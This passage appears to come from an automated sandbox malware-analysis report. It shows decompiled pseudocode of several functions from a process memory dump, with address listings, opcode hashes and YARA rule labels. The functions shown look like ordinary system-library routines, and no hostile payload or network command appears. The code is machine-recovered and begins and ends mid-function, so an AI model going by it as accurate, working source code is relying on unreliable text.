																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0188922A(_t99);
										_t64 = L018A7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E01958B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x19786c0; // 0x14207b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x19786b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x19786bc;
													_t87 = 0x19786b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01889240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x19786c4;
												_t87 = 0x19786c0;
												L27:
												E018B9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E018DD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1975388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x197538c = _t51;
						goto L6;
					}
				}
			}




















                                                  0x01889082
                                                  0x01889083
                                                  0x01889084
                                                  0x01889085
                                                  0x01889087
                                                  0x01889096
                                                  0x01889098
                                                  0x01889098
                                                  0x0188909e
                                                  0x018890a8
                                                  0x018890e7
                                                  0x018890e7
                                                  0x018890aa
                                                  0x018890b0
                                                  0x018890b7
                                                  0x018890bd
                                                  0x018890dd
                                                  0x018890e6
                                                  0x018890bf
                                                  0x018890bf
                                                  0x018890c7
                                                  0x018890cf
                                                  0x018890f1
                                                  0x018890f2
                                                  0x018890f4
                                                  0x018890f5
                                                  0x018890f6
                                                  0x018890f7
                                                  0x018890f8
                                                  0x018890f9
                                                  0x018890fa
                                                  0x018890fb
                                                  0x018890fc
                                                  0x018890fd
                                                  0x018890fe
                                                  0x018890ff
                                                  0x01889100
                                                  0x01889102
                                                  0x01889107
                                                  0x0188910c
                                                  0x01889110
                                                  0x01889113
                                                  0x01889115
                                                  0x01889136
                                                  0x0188913f
                                                  0x01889143
                                                  0x018e37e4
                                                  0x018e37e4
                                                  0x01889117
                                                  0x01889117
                                                  0x0188911d
                                                  0x00000000
                                                  0x0188911f
                                                  0x0188911f
                                                  0x01889125
                                                  0x00000000
                                                  0x01889127
                                                  0x0188912d
                                                  0x01889130
                                                  0x01889134
                                                  0x01889158
                                                  0x0188915d
                                                  0x01889161
                                                  0x01889168
                                                  0x018e3715
                                                  0x0188916e
                                                  0x0188916e
                                                  0x01889175
                                                  0x01889177
                                                  0x0188917e
                                                  0x0188917f
                                                  0x01889182
                                                  0x01889182
                                                  0x01889187
                                                  0x01889187
                                                  0x0188918a
                                                  0x0188918d
                                                  0x0188918f
                                                  0x01889192
                                                  0x01889195
                                                  0x01889198
                                                  0x01889198
                                                  0x01889198
                                                  0x0188919a
                                                  0x00000000
                                                  0x00000000
                                                  0x018e371f
                                                  0x018e3721
                                                  0x018e3727
                                                  0x018e372f
                                                  0x018e3733
                                                  0x018e3735
                                                  0x018e3738
                                                  0x018e373b
                                                  0x018e373d
                                                  0x018e3740
                                                  0x00000000
                                                  0x018e3746
                                                  0x018e3746
                                                  0x018e3749
                                                  0x00000000
                                                  0x018e374f
                                                  0x018e374f
                                                  0x018e3751
                                                  0x018e3757
                                                  0x018e3759
                                                  0x018e375c
                                                  0x018e375c
                                                  0x018e375e
                                                  0x018e375e
                                                  0x018e3761
                                                  0x018e3764
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3766
                                                  0x018e3768
                                                  0x018e37a3
                                                  0x018e37a3
                                                  0x018e37a5
                                                  0x018e37a7
                                                  0x018e37ad
                                                  0x018e37b0
                                                  0x018e37b2
                                                  0x018e37bc
                                                  0x018e37c2
                                                  0x018e37c2
                                                  0x018e37b2
                                                  0x01889187
                                                  0x01889187
                                                  0x0188918a
                                                  0x0188918d
                                                  0x0188918f
                                                  0x01889192
                                                  0x01889195
                                                  0x00000000
                                                  0x01889195
                                                  0x00000000
                                                  0x018e376a
                                                  0x018e376a
                                                  0x018e376a
                                                  0x018e376c
                                                  0x018e376c
                                                  0x018e376f
                                                  0x018e3775
                                                  0x00000000
                                                  0x00000000
                                                  0x018e3777
                                                  0x018e3779
                                                  0x018e3782
                                                  0x018e3787
                                                  0x018e3789
                                                  0x018e3790
                                                  0x018e3790
                                                  0x018e378b
                                                  0x018e378b
                                                  0x018e378b
                                                  0x018e3792
                                                  0x018e3795
                                                  0x00000000
                                                  0x018e3795
                                                  0x00000000
                                                  0x018e3779
                                                  0x018e3798
                                                  0x00000000
                                                  0x018e3798
                                                  0x00000000
                                                  0x018e3768
                                                  0x018e379b
                                                  0x018e379b
                                                  0x018e3751
                                                  0x018e3749
                                                  0x00000000
                                                  0x018e3740
                                                  0x018891a0
                                                  0x018891a3
                                                  0x018891a9
                                                  0x018891b0
                                                  0x00000000
                                                  0x018891b0
                                                  0x01889187
                                                  0x018891b4
                                                  0x018891b4
                                                  0x018891bb
                                                  0x018891c0
                                                  0x018891c5
                                                  0x018891c7
                                                  0x018e37da
                                                  0x018891cd
                                                  0x018891cd
                                                  0x018891cd
                                                  0x018891d2
                                                  0x018891d5
                                                  0x01889239
                                                  0x01889239
                                                  0x018891d7
                                                  0x018891db
                                                  0x018891e1
                                                  0x018891e7
                                                  0x018891fd
                                                  0x01889203
                                                  0x0188921e
                                                  0x01889223
                                                  0x00000000
                                                  0x01889205
                                                  0x01889205
                                                  0x01889208
                                                  0x0188920c
                                                  0x01889214
                                                  0x01889214
                                                  0x0188920c
                                                  0x018891e9
                                                  0x018891e9
                                                  0x018891ee
                                                  0x018891f3
                                                  0x018891f3
                                                  0x018891f3
                                                  0x018891e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01889134
                                                  0x01889125
                                                  0x0188911d
                                                  0x0188914e
                                                  0x018890d1
                                                  0x018890d1
                                                  0x018890d3
                                                  0x018890d6
                                                  0x018890d8
                                                  0x00000000
                                                  0x018890d8
                                                  0x018890cf

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78a552c5ddaa744fea662d948ea11a28734b65f4f1695679a21f350265dab244
                                                  • Instruction ID: c92a7efa1937e23aeff639b6b66509de501d4b7a54d7157ea1b9323e52145c4c
                                                  • Opcode Fuzzy Hash: 78a552c5ddaa744fea662d948ea11a28734b65f4f1695679a21f350265dab244
                                                  • Instruction Fuzzy Hash: A001A472905704CFE325AF1CD840B25BBE9EF85729F264066E509CB7A2C774ED42CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01954015 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E01954015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E018A2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E018A2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x19786ac);
					E0188F900(0x19786d4, _t28);
					L0189FFB0(0x19786ac, _t28, 0x19786ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					L0189FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                  0x0195401a
                                                  0x0195401e
                                                  0x01954023
                                                  0x01954028
                                                  0x01954029
                                                  0x0195402b
                                                  0x0195402f
                                                  0x01954043
                                                  0x01954046
                                                  0x01954051
                                                  0x01954057
                                                  0x0195405f
                                                  0x01954062
                                                  0x01954067
                                                  0x0195406f
                                                  0x0195407c
                                                  0x0195407c
                                                  0x0195408c
                                                  0x0195408c
                                                  0x01954097

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f61fe5c0134f83ee13f5edeb22be53915c15c2208f6397bc945a402ce1e3794
                                                  • Instruction ID: 34481433b987af66bce6dcf56594ba53e64e7f892854dacfc832ef6485b7b8d6
                                                  • Opcode Fuzzy Hash: 9f61fe5c0134f83ee13f5edeb22be53915c15c2208f6397bc945a402ce1e3794
                                                  • Instruction Fuzzy Hash: B1017C72201A467FD761AB7DCD84E53BBACFF95760B000229B608C3A11DB24ED51C6E5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194138A Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E0194138A(void* __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x197d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E018CFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(L018A7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				return L018CB640(E018C9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34,  *_t21 & 0x000000ff);
			}

















                                                  0x0194138a
                                                  0x0194138a
                                                  0x01941399
                                                  0x019413a3
                                                  0x019413a8
                                                  0x019413aa
                                                  0x019413b5
                                                  0x019413bb
                                                  0x019413c3
                                                  0x019413c6
                                                  0x019413c9
                                                  0x019413d4
                                                  0x019413e6
                                                  0x019413d6
                                                  0x019413df
                                                  0x019413df
                                                  0x019413f1
                                                  0x019413f2
                                                  0x019413f4
                                                  0x0194140e

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb1ccb2cbba84d25bb40d8f044a4315e5da4214361488513b8133a221c803019
                                                  • Instruction ID: 475eab01cb9d5ee42b1cbd20c42ff330cb26c321c3afe5f76849d74512db2072
                                                  • Opcode Fuzzy Hash: cb1ccb2cbba84d25bb40d8f044a4315e5da4214361488513b8133a221c803019
                                                  • Instruction Fuzzy Hash: 9F015271A01359AFDB14DFADD841EAEBBB8EF44710F40406AF904EB280D674DA41CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018858EC Relevance: .0, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E018858EC(void* __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				void* _t17;
				void* _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x197d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x1865c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E01885943() != 0 &&  *0x1975320 > 5) {
					E01907B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01907B5E( &_v28, _t28);
					_t11 = E01907B9C(0x1975320, 0x186bf15,  &_v28, _t22, 4,  &_v76);
				}
				return L018CB640(_t11, _t17, _v8 ^ _t29, 0x186bf15, _t27, _t28);
			}















                                                  0x018858fb
                                                  0x018858fe
                                                  0x01885906
                                                  0x0188590a
                                                  0x0188593c
                                                  0x0188593c
                                                  0x0188590c
                                                  0x0188590c
                                                  0x01885911
                                                  0x00000000
                                                  0x01885913
                                                  0x01885913
                                                  0x01885913
                                                  0x01885911
                                                  0x0188591d
                                                  0x018e1035
                                                  0x018e103c
                                                  0x018e103f
                                                  0x018e1056
                                                  0x018e1056
                                                  0x0188593b

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d2334cd576c0f4fd599c0ea3958e165b1b5fcb73af4619aeb0d9463807b8b95
                                                  • Instruction ID: 67fc931de8e688b2bf1508dd37aa125f2c456ba4159eab560fcd859de124464b
                                                  • Opcode Fuzzy Hash: 7d2334cd576c0f4fd599c0ea3958e165b1b5fcb73af4619aeb0d9463807b8b95
                                                  • Instruction Fuzzy Hash: E9018431B00509DBD714EA69EC059AEBBACEF81370F5500699A09DB294DE30EF05C691
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0189B02A Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0189B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(L018A7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01907016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                  0x0189b037
                                                  0x0189b039
                                                  0x0189b03b
                                                  0x0189b040
                                                  0x018ea60e
                                                  0x00000000
                                                  0x00000000
                                                  0x018ea61d
                                                  0x0189b04b
                                                  0x0189b04e
                                                  0x018ea627
                                                  0x018ea634
                                                  0x00000000
                                                  0x00000000
                                                  0x018ea641
                                                  0x018ea653
                                                  0x018ea643
                                                  0x018ea64c
                                                  0x018ea64c
                                                  0x018ea65b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018ea66c
                                                  0x0189b057
                                                  0x0189b057
                                                  0x0189b057
                                                  0x0189b046
                                                  0x0189b046
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction ID: e7f79c06a7dd245dd5e54acddd9eb7f6bc9cba05ed4465beae80f99d06358493
                                                  • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                  • Instruction Fuzzy Hash: 1C01D4322045849FE726C71DD888F667BDCEB82B54F0900A1FA19CB661D669DE40C620
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01951074 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E01951074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v11;
				unsigned int _v12;
				intOrPtr _v15;
				void* __esi;
				void* __ebp;
				unsigned int _t13;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 = _t13;
				if(_a4 != 0) {
					_push((_t13 >> 0x14) + (_t13 >> 0x14));
					L0195165E(__ebx, 0x1978ae4, (__edx -  *0x1978b04 >> 0x14) + (__edx -  *0x1978b04 >> 0x14), __edi, __ecx, (__edx -  *0x1978b04 >> 0x14) + (__edx -  *0x1978b04 >> 0x14));
				}
				_push( *((intOrPtr*)(_t35 + 0x38)));
				_push( *((intOrPtr*)(_t35 + 0x34)));
				_push(0x8000);
				L0194AFDE( &_v8,  &_v12);
				if(L018A7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = L0193FE3F(_t22, _t35, _v11, _v15);
				}
				return _t16;
			}












                                                  0x01951074
                                                  0x01951080
                                                  0x01951082
                                                  0x0195108a
                                                  0x0195108f
                                                  0x01951093
                                                  0x019510a8
                                                  0x019510ab
                                                  0x019510ab
                                                  0x019510b0
                                                  0x019510b7
                                                  0x019510be
                                                  0x019510c3
                                                  0x019510cf
                                                  0x019510e1
                                                  0x019510d1
                                                  0x019510da
                                                  0x019510da
                                                  0x019510e9
                                                  0x019510f5
                                                  0x019510f5
                                                  0x019510fe

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 379735626340d237a47b4b4606b8461b2f1f583729811898d0052ea48bef9868
                                                  • Instruction ID: b91270e7fa6a2f1faabbf020b70c774cf1806851a088d7227852c51325b13a9d
                                                  • Opcode Fuzzy Hash: 379735626340d237a47b4b4606b8461b2f1f583729811898d0052ea48bef9868
                                                  • Instruction Fuzzy Hash: 1A014C726047429FC750EF78C804B1A7BD9AFC4310F048629FD8A93690DE30D540CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01958A62 Relevance: .0, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E01958A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x197d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(L018A7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				return L018CB640(E018C9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}
















                                                  0x01958a62
                                                  0x01958a71
                                                  0x01958a79
                                                  0x01958a82
                                                  0x01958a85
                                                  0x01958a89
                                                  0x01958a8c
                                                  0x01958a8f
                                                  0x01958a92
                                                  0x01958a95
                                                  0x01958a9f
                                                  0x01958ab1
                                                  0x01958aa1
                                                  0x01958aaa
                                                  0x01958aaa
                                                  0x01958abc
                                                  0x01958abd
                                                  0x01958abf
                                                  0x01958ada

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8b475c227a0f2c492a1f8173f7266c0949afc82c912a40ef02b1157538aac4d2
                                                  • Instruction ID: af469a6797e41dc2f2252d1a89f9b867f4ef1254fdd9411a91b4e04463687dd4
                                                  • Opcode Fuzzy Hash: 8b475c227a0f2c492a1f8173f7266c0949afc82c912a40ef02b1157538aac4d2
                                                  • Instruction Fuzzy Hash: 08012C71A0121DAFDB04DFADD9419AEBBB8EF58710F10405AF904F7341D634AA00CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188DB60 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0188DB60(intOrPtr* __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *__ecx != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0188DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = L0188E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0188E8B0(__ecx, _t14, 0xfff);
							L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                  0x0188db64
                                                  0x0188db66
                                                  0x0188db6b
                                                  0x0188dbaa
                                                  0x0188db71
                                                  0x0188db76
                                                  0x0188db7a
                                                  0x0188dba3
                                                  0x0188db7c
                                                  0x0188db87
                                                  0x0188db8b
                                                  0x018e4fa1
                                                  0x018e4fb3
                                                  0x018e4fb8
                                                  0x0188db91
                                                  0x0188db96
                                                  0x0188db98
                                                  0x0188db98
                                                  0x0188db8b
                                                  0x0188db7a
                                                  0x0188db9d
                                                  0x0188dba2

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                  • Instruction ID: 328f25b979410f4da2a607b33a26d2d14b0579fc8d4d47c4a0ce0024401dae89
                                                  • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                  • Instruction Fuzzy Hash: 26F09C332415239BD7327ADD4984F6BBA959FD2B60F150135F205DB384C9608E0296D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188B1E1 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0188B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(L018A7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(L018A7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E01907016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                  0x0188b1e8
                                                  0x0188b1ea
                                                  0x0188b1f3
                                                  0x018e4a17
                                                  0x0188b1f9
                                                  0x0188b1f9
                                                  0x0188b1f9
                                                  0x0188b201
                                                  0x018e4a21
                                                  0x018e4a2e
                                                  0x00000000
                                                  0x00000000
                                                  0x018e4a3b
                                                  0x018e4a4d
                                                  0x018e4a3d
                                                  0x018e4a46
                                                  0x018e4a46
                                                  0x018e4a55
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0188b20a
                                                  0x0188b20a
                                                  0x0188b20a
                                                  0x0188b20a

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                  • Instruction ID: d85cef03fdd2d2d9990745c818eeff2b4a404a2c1b6e8bf7aecf3e9806a59cf8
                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                  • Instruction Fuzzy Hash: EB01A4322016849FE322A75DC808F697FD9EF92764F0940A1FA18CB6B2D779DA01C355
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0194131B Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E0194131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				void* _t24;
				void* _t30;
				void* _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x197d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(L018A7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				return L018CB640(E018C9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31,  *_t18 & 0x000000ff);
			}















                                                  0x0194131b
                                                  0x0194132a
                                                  0x01941330
                                                  0x01941336
                                                  0x0194133e
                                                  0x01941341
                                                  0x01941344
                                                  0x0194134f
                                                  0x01941361
                                                  0x01941351
                                                  0x0194135a
                                                  0x0194135a
                                                  0x0194136c
                                                  0x0194136d
                                                  0x0194136f
                                                  0x01941387

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f04d95b67b728057d2c3b0ad82c8c430cd9d35a5ebb84eb3b8af30b22c192edb
                                                  • Instruction ID: f431ce8475ed517e3e7e4a2fd9505b141d21b67d0e05d1b3219e9f5c28e0af02
                                                  • Opcode Fuzzy Hash: f04d95b67b728057d2c3b0ad82c8c430cd9d35a5ebb84eb3b8af30b22c192edb
                                                  • Instruction Fuzzy Hash: E0011971A01249AFCB14EFADD545AAEB7F4EF18700F404069B945EB381E634EA40CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01958D34 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E01958D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
